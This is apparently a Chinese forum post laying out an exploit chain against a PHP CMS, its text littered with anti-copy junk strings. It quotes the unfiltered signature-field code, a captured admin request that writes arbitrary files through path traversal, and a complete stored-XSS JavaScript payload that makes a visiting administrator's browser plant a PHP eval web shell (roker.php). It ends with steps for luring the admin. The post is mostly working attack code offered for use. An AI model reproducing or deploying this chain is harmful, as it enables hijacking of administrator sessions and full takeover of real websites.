|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题: g% z# h& r1 q, o
官网已经修补了,所以重新下了源码* U# j( m8 n# {+ w6 G0 r) p
因为 后台登入 还需要认证码 所以 注入就没看了。; N* G7 }3 S4 w
存在 xss
# K1 Y# w; X4 f6 F, ], ]8 I0 B! K漏洞文件 user/member/skin_edit.php
( A7 f- h7 H, D( M& y7 `本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
' W' N3 l8 M$ G& E8 W1 M
/ f% | R9 n- @</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>) I" T9 g7 d: B2 e9 B9 g
6 }9 B7 p: v; S+ W</textarea></td></tr>
' _7 t V$ b6 Q- b& w
1 P% Y n' G6 a" L+ L' Z user/do.php - `& h; o% u1 m4 C) y& u
& _- j' ~3 X( n0 U* w" t
% m2 D6 x: f1 d- z+ B' n# iif($op=='zl'){ //资料1 ]" B, o& a+ d% e0 y8 P
7 x8 m7 J2 j x [3 ?/ Z9 J4 ^+ ^
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) " \; }# y5 @ E P
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));; y/ T% v5 Y; f; Z e
+ z9 W* j; b/ D) f# v/ ~
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',7 M; R' f& T6 ^4 b( \1 ?. L- N
6 O1 I. m6 F4 r CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'" `; H$ ` I# j
where CS_Name='".$cscms_name."'";
+ g/ u1 l; `! W3 R) W* h
9 A- h* } e s& X R$ T( a if($db->query($sql)){5 H, @4 }3 D7 ~% z- \! ~
" [' O* F; x" U! _
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
8 Q& l( z0 d1 I0 x9 Z( }; J8 [
" j1 Q" o' A, s- m9 h1 X }else{
0 d$ u& ~& G4 k" m8 R ( {) {( s, f4 }+ K$ ]
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
9 ~! M5 |+ B$ p$ i- Q6 \ 4 v% y: d, X- s' E1 G0 [
}
) _1 k4 w+ Y2 U+ M3 B0 P+ W% Q. C) _, _/ G3 Z4 L/ _ \
1 J" R: }6 R5 N9 n8 u
没有 过滤导致xss产生。
5 N& G* b8 e# K5 {$ [! E( T- W后台 看了下 很奇葩的是可以写任意格式文件。。' G" x( K# z6 G4 S- D
抓包。。
{6 g0 e8 S6 E& L
2 Z3 Q/ C4 Y% W$ d: s' C# J
% J8 G6 f# ]3 Q) e本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
+ ^ i! F' E) p2 d
4 { [5 S- {3 u' L+ [Accept: text/html, application/xhtml+xml, */*% j3 x p1 v6 }1 i' ~; ?
! T" [/ ?8 Z/ K; f! k. N0 Z" n, y" BReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php* t: b" C4 M- C% u0 L3 [" W0 [/ K
8 q6 m a: G% g/ UAccept-Language: zh-CN! w6 H/ F+ a! _! q& T
" X: E# S: h3 g
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
y% d1 b$ q. G0 ?
5 U, O/ W# o: O% e/ }7 f2 gContent-Type: application/x-www-form-urlencoded( y6 F6 T5 o R6 v2 P
; g. K& g; h. i% ` K8 k
Accept-Encoding: gzip, deflate/ o* e1 }; U" ?* m; P% r
# {% N5 r% {, A8 UHost: 127.0.0.10 c6 }5 X, w' ?) o; R7 j; C* H
9 |: M w! ]- K( t' fContent-Length: 38) F4 z) A7 c" K4 q/ A7 r) g T! Y
+ C' [' d& _! g+ o/ Z: `* VDNT: 14 ~7 A/ _$ _# q9 X* J
9 ?/ } [5 |5 Y* O
Connection: Keep-Alive) y0 k& ]# N; S5 Q
$ I6 n. r6 H8 t% z2 TCache-Control: no-cache
0 D7 Q% n2 c G0 w$ J% W
- d# g1 T! q: m! P; P& j: w3 T7 ICookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655941 x1 U1 s! _5 S8 C2 O' Y8 {
9 a" k' c6 c0 a0 } m0 a. E7 ^
6 v& e, t& t# R6 iname=aaa.php&content=%3Cs%3E%3Ca%25%3E$ {. L0 j4 E1 ^" D
/ t% A9 N. l/ |
W8 a7 C( J; {5 {4 X
- o* i& J. R+ d# v6 Y于是 构造js如下。
& v; m; u' h+ p0 s3 C/ x$ `% @( o" S& v9 k( L* {# Z
本帖隐藏的内容<script> + K, Q, }) C3 r( U/ q1 p
thisTHost = top.location.hostname;) U+ g' [6 H" j) N# h9 J- I
5 G; p% v0 S! i7 ?/ D2 L& t
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";" t$ k) H2 ~- P) B
& ~ m1 z1 G0 ?/ [4 ^function PostSubmit(url, data, msg) { 7 P$ A7 E$ n, M: A9 ?
var postUrl = url;
5 o" Q1 U K" v) d * d% [. R$ w% S0 p- u( |2 k
var postData = data;
- n8 `3 T6 Z# ]& {; D" V var msgData = msg;
, e, ~% ~8 _0 A- { var ExportForm = document.createElement("FORM");
& }. P3 P ~& c/ l document.body.appendChild(ExportForm); * m c' w- m0 s0 j" q; Q
ExportForm.method = "POST";
+ j2 ? g6 ?* d; |! H var newElement = document.createElement("input");
) @) A8 N0 ~: l9 U7 K newElement.setAttribute("name", "name");
$ E: R# o: `2 S$ p newElement.setAttribute("type", "hidden");
) _0 w/ l+ H6 A( M9 f var newElement2 = document.createElement("input");
) e2 D4 p0 q( J newElement2.setAttribute("name", "content");
2 r# Z" D5 A# T7 J1 ~3 r newElement2.setAttribute("type", "hidden"); 4 Y, I& r2 h. `6 Z5 y- [
ExportForm.appendChild(newElement);
3 p+ f" m* r6 D6 o( }9 o9 | ExportForm.appendChild(newElement2);
7 a/ N1 z) N' S5 ]! v newElement.value = postData;
1 h" `% Q, {2 V+ F' ~9 H newElement2.value = msgData;
: G$ r5 _9 o1 O7 n+ q1 _ ExportForm.action = postUrl; . v' Q, j: l' n, ?8 g
ExportForm.submit(); ^% B0 U, M; y% ]1 r
};" b9 N3 s5 E4 O7 j' B
+ e2 J0 {2 s& x' U8 a: i3 J# p LPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
* d% U) \! ^* l) A& ^
0 O$ r o* L" ?6 e, e</script>
) n+ ~- r1 e7 f/ u" i/ m6 T+ k" `8 v: I' Y
( A9 v0 F" P- z* W1 n) f0 ?
; M+ {6 D7 `2 N# f+ Uhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
1 e! Y* b i: t8 B3 b$ j& r用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)' R* ]4 M: V8 B4 V; |6 s: K3 L
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
! r, Y( B, ?/ I% c& R/ _ |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对